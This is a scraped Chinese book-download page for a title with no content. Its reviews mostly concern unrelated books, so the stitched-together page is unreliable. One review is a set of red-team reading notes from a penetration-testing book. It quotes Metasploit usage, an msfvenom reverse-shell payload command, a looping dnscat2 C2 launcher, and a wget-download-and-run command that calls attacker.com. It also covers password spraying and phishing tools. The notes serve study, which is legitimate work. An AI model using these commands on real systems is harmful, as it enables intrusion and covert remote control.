科学认知犯罪 在线下载 pdf mobi 2025 epub 电子版

暂无相关简介，正在全力查找中！

暂无相关目录，正在全力查找中！

暂无相关内容，正在全力查找中

暂无出版社相关信息，正在全力查找中！

暂无相关书籍摘录，正在全力查找中！

在线阅读地址：科学认知犯罪在线阅读

在线听书地址：科学认知犯罪在线收听

在线购买地址：科学认知犯罪在线购买

暂无原文赏析，正在全力查找中！

暂无其它内容！

• 作者：先锋reader 发布时间：2019-12-04 21:36:44

  论卓越城市如何更加卓越。

• 作者：麻麻睇 发布时间：2019-04-06 00:40:27

  尽管充斥着种族、性别、宗教的歧视，这部揉入了作者生活经验的创世录，读来叫人欲罢不能。在新世界的巨大诱惑面前，这个所谓文明世界的代言人能够时而停下脚步，反思自身与社会，祈求灵魂得到善主上帝的救赎，于彼时不可谓不易。然而另一方面，被困于荒岛非但未令其沉沦，反倒激发出无所不能的勇气与活力，化身为小岛上帝的傲慢与自负又那么匪夷所思。如此这般的矛盾在反复胶着，也赋予了作品颇具玩味的价值。更何况跟着鲁滨逊的脚步，每天在新希望里创世冒险，实在也是一种不可多得的体验。

• 作者：洛水湛湛 发布时间：2022-05-27 17:07:16

  初中宅在学校图书馆看这本...从此被一脚踹进魏晋坑

• 作者：bij Akshara 发布时间：2022-01-09 14:58:39

  石头就躺在那里，向我们诉说。

• 作者：刺头王子 发布时间：2010-12-04 15:20:33

  文字太深 没仔细看 临摹了挺多艺术品

• 作者：ShawnZ 发布时间：2020-11-30 23:46:42

  这本科学哲学的书让我对科学的认知有了颠覆

• 红队选手很好的入门书籍

  作者：mengbo 发布时间：2020-10-10 10:18:13

  对于红队来说知识点覆盖相当全面了，特别是各种工具，都有简单的介绍。看的时候发现我对微软的系统真是一窍不通啊，这个短板只能有机会再说吧。

  导图 ">

  ## 导图

  

  《渗透测试实战第二版》 思维导图

  

  《渗透测试实战第三版》 思维导图

  摘抄 ">

  ## 摘抄

  ###《渗透测试实战第二版》

  P26已经有大量不同类型网站，帮助开始学习二进制漏洞基础知识。一个非常好的学习网站是 Over the Wire （

  http://overthewire.org/wargames/narnia/

  ）。Over the Wire 网站是一个在线夺旗挑战站点，专注于从二进制攻击到网站攻击所有方面的知识。

  P86使用通用配置命令运行 Metasploit

  help：提供帮助文档！

  search [string]：通过 CVE、标签和应用程序等査找漏洞。

  use [module]：选择模块。

  info：显示选定模块的信息。

  show options：显示模块设置参数。

  set and setg：设置选项中的变量值。使用 setg 设置全局变量值。如果需要在模块和漏洞直接切换，并且不想每次都输入 IP 地址（或其他输入），就建议使用 setg。

  对于远程溢出漏洞，在选项中可能看不到 PAYLOAD 参数，但是始终可以通过 setPAYLOAD [输入 tab 键多次进行选择适当参数]，设置该参数。

  设置定制的净荷：set EXE::Custom [file]。

  exploit -j：后台激活模块实现监听功能。

  P87 运行 Metasploit-一漏洞利用后续操作或其他

  sessions -K：关闭所有会话。

  background：将 Meterpreter shell 调入主界面，保持当前会话在后台运行。

  运行资源文件。.rc 脚本自动化处理（更多信息见本书的 9.3 节）：msfconsole -r resource.rc

  P136另外一个经常使用的资源是 OWASP Evasion 备忘录。在渗透测试时，一旦遇到编码问题，首先要查的就是它。这个表的下载网址是：h

  ttps://owasp.org/www-community/xss-filter-evasion-cheatsheet。

  批注：有人翻译了中文版

  P136测试这种问题有很多种复杂的方法，但是最简单的一种是通过流量代理的方法进行手动测试。按照转账的流程，按照上面描述的过程进行一次转账，然后检査是否可以重放。当时，重放攻击中，目标是能够取得相同效果的，但是不需要进行所有的步骤。如果是这样，就证实存在 CSRF 漏洞。

  P297 searchsploit找到的所有漏洞利用程序实际存储在文件夹 /usr/share/exploits/ 下。

  P324 Cobalt 基于 Metasploit 框架，具有攻击、中转、规避杀毒软件检测、持续控制等功能，最重要的是提供定制的净荷（比如 Beacon）。

  ###《渗透测试实战第三版》

  - 位置 #657-658

  由 MITRE 公司提出的 ATT&CK 矩阵( Adversarial Tactics, Techniques, and Common Knowledge matrix ) 是对 APT 攻击的详细分解。这个矩阵中是一个在各种攻击场景中使用的不同 TTP（Tactics、Techniques & Procedures）的大集合。

  - 位置 #673-674

  面对安全问题，企业的正确态度是从一开始就应该预设自己已经被攻破了。

  - 位置 #718-719

  搭建服务器的一个快速方法是集成 TrustedSec 公司的渗透测试框架 (

  PTF

  )。

  - 位置 #747-749

  Red Baron

  是 Terraform 的一组模块和自定义/第三方提供者，它可以为红队自动创建弹性、一次性、安全和灵活的基础设施。无论你想要构建一个钓鱼服务器，Cobalt Strike 基础设施，或创建 DNS C2 服务器，你都可以用 Terraform 做到这一切。

  - 位置 #769-771

  使用 PowerShell 进行模糊处理：

  msfvenom -payload windows/x64/meterpreter_reverse_http -format psh -out meterpreter-64.ps1 LHOST=127.0.0.1

  - 位置 #853-854

  Empire 是一个后期漏洞利用的框架，包含一个纯 PowerShell2.0 的 Windows 代理和一个纯 Python 2.6/2.7 的 Linux/OS X 代理。

  - 位置 #915-916

  如果你尚未在 Kali 图形界面上安装 PowerShell，那么最好的方法是手动安装它。

  - 位置 #923-925

  dnscat2 就是一款利用 DNS 协议创建加密 C2 隧道来控制服务器的工具，所以说这种隧道几乎在每个网络中都可以使用.

  - 位置 #974-975

  我通常喜欢使用快速 bash 脚本启动我的 dnscat payload：

  nohup /bin/bash -c “while true; do /opt/dnscat2/client/dnscat loca1host.com -secret 9dfj3hdsfajh37e8c902j -max-retransmits 5; sleep 3600; done” > /dev/null 2>&1 &

  - 位置 #1003-1003

  我们有很多时候想要将来自攻击服务器的流量通过我们的受感染主机传递到其他内部服务器。使用 dnscat2 执行此操作的最安全方法是通过本地端口转发我们的流量，然后将流量通过隧道传输到内部网络上的其他机器上。我们可以通过命令会话中的以下命令来完成此示例：

  listen 127.0.0.1:9999 10.100.100.1:22

  - 位置 #1083-1084

  每天用默认的端口运行 nmap，然后使用 ndiff 比较结果。

  - 位置 #1088-1089

  Masscan 对我们最初的侦察很有用，但通常不用于比较差异。

  - 位置 #1148-1149

  Censys.io 持续监控 Internet 上的每一台可访问的服务器和设备，以便你可以实时搜索和分析它们。

  - 位置 #1943-1945

  可以在这里找到 Hans-Michael 完整的演练示例和代码：

  https://github.com/Varbaek/xsser

  。 Hans-Michael 提供了一些关于重建 XSS 到 RCE 攻击的精彩示例和视频。

  - 位置 #2224-2226

  有一个类似 SQLmap 的名为 Tplmap 的工具，它可以尝试模板注入的所有不同组合。

  - 位置 #2239-2240

  可以在此处找到不同类型的 webshell payload 的绝佳列表：

  https://github.com/tennc/webshell

  - 位置 #2519-2520

  信息收集阶段，我们发现并识别了大量的电子邮箱地址和用户名帐号，我们将对这些获取到的信息进行一种叫“密码喷洒”（Password Spraying）的攻击。

  - 位置 #2525-2526

  密码爆破是用多个密码尝试破解同一个 ID。而密码喷洒攻击，是用一个密码来尝试多个用户 ID，以便至少有一个用户 ID 被泄露。

  - 位置 #2542-2544

  有很多工具可以实现密码喷洒攻击，但是，我们只关注其中的几个。第一个是来自 Spiderlabs 的名为 Spray 的工具。

  - 位置 #2789-2791

  我们可以在一个名为

  RTFM.py

  的工具中轻松搜索到这些命令，这是 @leostat 基于 RTFM 书籍(很棒的资源)创建的一个快速查询的 Python 脚本，其中包含大量这些方便的命令。

  - 位置 #2853-2857

  我们可以在受害者系统上使用系统默认自带的命令来查看安装了哪些系统补丁包。Windows 自带默认命令systeminfo 将提取任何给定的 Windows 主机的所有补丁安装历史记录。我们可以拿回这个输出结果，将其复制到我们的 Kali 系统并运行 Windows Exploit Suggester 以查找已知的漏洞然后针对性的进行漏洞利用从而提升权限。

  - 位置 #2874-2876

  测试并尝试不同类型的权限升级漏洞的最佳实验环境是 Rapid7的 Metasploitable3。

  - 位置 #2910-2911

  Mimikatz 自推出以来，就改变了在渗透入侵中获取明文密码的方式。

  - 位置 #2980-2982

  有多个渗透攻击框架的 payload 支持 Mac，我最喜欢的是使用 Empire。Empire 可以生成多个 payload 来诱骗受害者执行我们的代理，其中包括 Ducky scripts、二进制可执行程序、Office 宏、Safari 启动程序、pkg 安装包等等。

  - 位置 #3437-3438

  我们可以利用默认的 SSH 客户机，使用本地端口转发（-L）。

  - 位置 #3484-3484

  在我们进行任何类型的权限提升攻击之前，我首先要在 Linux 主机上进行一个良好的信息收集工作，并识别所有关于系统的信息。这包括用户、服务、定时任务、软件版本、弱信任对象、错误配置的文件权限，甚至是 Docker 信息。我们可以使用一个名为 LinEnum 的工具来为我们完成所有的累活（

  https://github.com/rebootuser/linenum

  ）。

  - 位置 #3491-3492

  运行一个名为 linux-exploit-suggester 的工具来分析主机系统并识别缺失的补丁和漏洞。

  - 位置 #3574-3578

  我们需要在 Web 服务器上放上我们的 payload，这样我们就可以让我们的 metasploit payload 抓取 dnscat 恶意软件。在 dnscat2 客户机文件夹中是 dnscat 二进制文件。

  ...

  set CMD wget http:///dnscat -O /tmp/dnscat && chmod+x /tmp/dnscat && /tmp/dnscat --dns server=attacker.com，port=53 --secret=

  run

  - 位置 #3710-3711

  快速克隆Web应用程序登录验证页的最佳工具之一是 TrustedSec 公司开发的社会工程学工具包（Social Engineering Toolkit，简称 SET）。

  - 位置 #3736-3736

  当受害者在我们的钓鱼网页上输入登陆凭证时，ReelPhish 允许红队利用 Selenium 和 Chrome 来自动触发双因素验证。

  - 位置 #4007-4009

  LAN Turtle 的目的是取代 dropbox（一款可以同步本地文件的网络存储在线网盘应用）。尽管它带有许多其他功能和应用程序工具，如自动连接 SSH、DNS 欺骗、meterpreter、ptunnel、script2email、urlsnarf、responder 等等，但红队使用的主要功能是“使用 LAN Turtle 获得进入网络的权限”。

  - 位置 #4162-4163

  Bash Bunny 是 Rubber Ducky 的升级版本。

  - 位置 #4992-4993

  通过 Invoke-Obfuscation 混淆框架，我们可以使用以下几种不同的技术对这个字符串进行深度混淆。

• 致命的均與愛上經濟

  作者：zai912 发布时间：2006-08-16 17:21:58

  《致命的均衡》並不是一個出色的推理故事，如果你是為了看推理故事而讀這本書，可能會感到失望，但《致命的均衡》目的不是要說一個精彩的推理故事，而是要說明一些經濟學的基本概念，因此讀書可能不會對推理故事有太大的期望，會原諒作者杜撰這個沒什麼可推的推理故事。以故事形式來介紹經濟學的概念，讀起來也很有趣，問題是，當你花時間看完了一個250頁並不精彩的推理故事，有多少經濟學的概念會留在腦袋裡，它們裡留在腦袋裡多久，還是我要了解這些相關概念時直接了當找一本經濟學大辭典看算了，雖然是枯燥了點，但可省回不少的時間，這也是經濟學的機會成本問題。

  　　另一本同類的書籍《愛上經濟》，這書是多年前看過的，通過一個愛情故事，男主人翁是一個市場的支持者，女主翁是一個人權和公義的捍衛者，透過兩人意識形態的分歧，凸顯市場和人道矛盾，讀起來更有趣味，但要說裡面提到經濟學概念，當需要時用時我還是要找本經濟學大亂典看。